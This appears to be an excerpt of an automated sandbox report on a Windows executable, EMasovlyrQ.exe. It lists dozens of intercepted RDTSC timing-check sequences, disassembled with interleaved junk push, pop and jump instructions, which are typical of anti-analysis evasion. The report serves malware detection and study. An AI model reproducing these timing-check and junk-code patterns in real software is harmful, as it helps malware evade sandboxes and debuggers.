Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7AB1 second address: 11A7AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7C22 second address: 11A7C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F7C49018EDEh 0x0000000f jns 00007F7C49018EE7h 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F7C49018EDCh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7DF7 second address: 11A7E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7C48CABF1Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7E09 second address: 11A7E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7E0D second address: 11A7E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7E17 second address: 11A7E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7E1B second address: 11A7E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007F7C48CABF18h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7C48CABF23h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7F91 second address: 11A7F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7F95 second address: 11A7F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7F99 second address: 11A7F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11AB6AD second address: 11AB6CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7C48CABF1Eh 0x0000000b jng 00007F7C48CABF1Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11ACE26 second address: 11ACE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11ACE2A second address: 11ACE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11ACE2E second address: 11ACE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F7C49018EDCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11ACE3E second address: 11ACE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B4884 second address: 11B489A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C49018EE2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B489A second address: 11B48AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C48CABF1Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B2C7D second address: 11B2C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F7C49018EDEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B2C90 second address: 11B2C9A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7C48CABF1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B2C9A second address: 11B2CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b jno 00007F7C49018EE8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B2CC1 second address: 11B2CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B2CC7 second address: 11B2CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B2F19 second address: 11B2F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 jl 00007F7C48CABF16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B2F29 second address: 11B2F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B2F32 second address: 11B2F45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B308B second address: 11B30A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7C49018EECh 0x0000000c jmp 00007F7C49018EE0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B31F8 second address: 11B31FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B336C second address: 11B337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 jl 00007F7C49018EDCh 0x0000000d jng 00007F7C49018ED6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B337F second address: 11B339A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C48CABF25h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B378D second address: 11B37BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C49018EE7h 0x00000009 jmp 00007F7C49018EE4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B37BC second address: 11B37C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B862F second address: 11B8639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7C49018ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11B8639 second address: 11B863D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11BB863 second address: 11BB868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11BB868 second address: 11BB8AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF26h 0x00000007 jmp 00007F7C48CABF1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7C48CABF29h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11BB5B0 second address: 11BB5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11BB5B4 second address: 11BB5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F7C48CABF16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C7758 second address: 11C775E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C938E second address: 11C9392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C9392 second address: 11C93B2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7C49018ED6h 0x00000008 jl 00007F7C49018ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7C49018EDCh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C9519 second address: 11C9535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7C48CABF25h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C9535 second address: 11C9541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7C49018ED6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C9541 second address: 11C956B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F7C48CABF16h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C956B second address: 11C9578 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7C49018ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C9578 second address: 11C9583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7C48CABF16h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11C9583 second address: 11C9589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11CFFE9 second address: 11CFFF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11CFFF1 second address: 11CFFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11CFFF5 second address: 11CFFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11CFFF9 second address: 11D0007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11D0007 second address: 11D000B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11D481E second address: 11D4825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11D4825 second address: 11D4830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11D4830 second address: 11D4834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11DE73B second address: 11DE73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E1939 second address: 11E193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E193D second address: 11E1946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E45BA second address: 11E45BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E45BF second address: 11E45C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E45C7 second address: 11E45D1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7C49018ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E8971 second address: 11E898B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7C48CABF1Bh 0x0000000b ja 00007F7C48CABF16h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E8AF1 second address: 11E8AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E8DCE second address: 11E8E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F7C48CABF29h 0x0000000b pop ecx 0x0000000c jne 00007F7C48CABF2Bh 0x00000012 jmp 00007F7C48CABF1Dh 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E90EF second address: 11E90F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E90F5 second address: 11E90F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11E9266 second address: 11E929C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7C49018EE5h 0x0000000b jmp 00007F7C49018EE7h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11EE902 second address: 11EE908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11EE908 second address: 11EE912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11EE45E second address: 11EE464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11EE5FF second address: 11EE604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 12284C3 second address: 12284CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F7C48CABF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 12284CD second address: 12284D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1238D65 second address: 1238D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1238D6B second address: 1238D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1238D6F second address: 1238D7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 123B623 second address: 123B636 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7C49018ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 12FFCEF second address: 12FFD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C48CABF29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 12FFD0C second address: 12FFD30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007F7C49018ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7C49018EDEh 0x00000017 pop edi 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 12FFD30 second address: 12FFD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 12FFD37 second address: 12FFD43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7C49018ED6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 12FFD43 second address: 12FFD6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7C48CABF21h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 12FFD6A second address: 12FFD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1300012 second address: 130002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7C48CABF16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7C48CABF1Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 130002D second address: 1300046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1300046 second address: 130004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1300321 second address: 1300356 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7C49018ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7C49018EDDh 0x00000012 jmp 00007F7C49018EE8h 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1300356 second address: 1300375 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F7C48CABF21h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F7C48CABF16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1300375 second address: 1300386 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7C49018ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1300386 second address: 1300391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7C48CABF16h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 130094D second address: 1300966 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7C49018ED6h 0x00000008 jbe 00007F7C49018ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jng 00007F7C49018ED6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1304ED7 second address: 1304EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 13051D5 second address: 130521A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 js 00007F7C49018EDCh 0x0000000f mov dword ptr [ebp+122D398Ch], edi 0x00000015 push 00000004h 0x00000017 mov edx, esi 0x00000019 call 00007F7C49018ED9h 0x0000001e jmp 00007F7C49018EE2h 0x00000023 push eax 0x00000024 ja 00007F7C49018EE0h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 130521A second address: 130524F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jo 00007F7C48CABF33h 0x00000010 pushad 0x00000011 jmp 00007F7C48CABF25h 0x00000016 je 00007F7C48CABF16h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 130524F second address: 1305253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
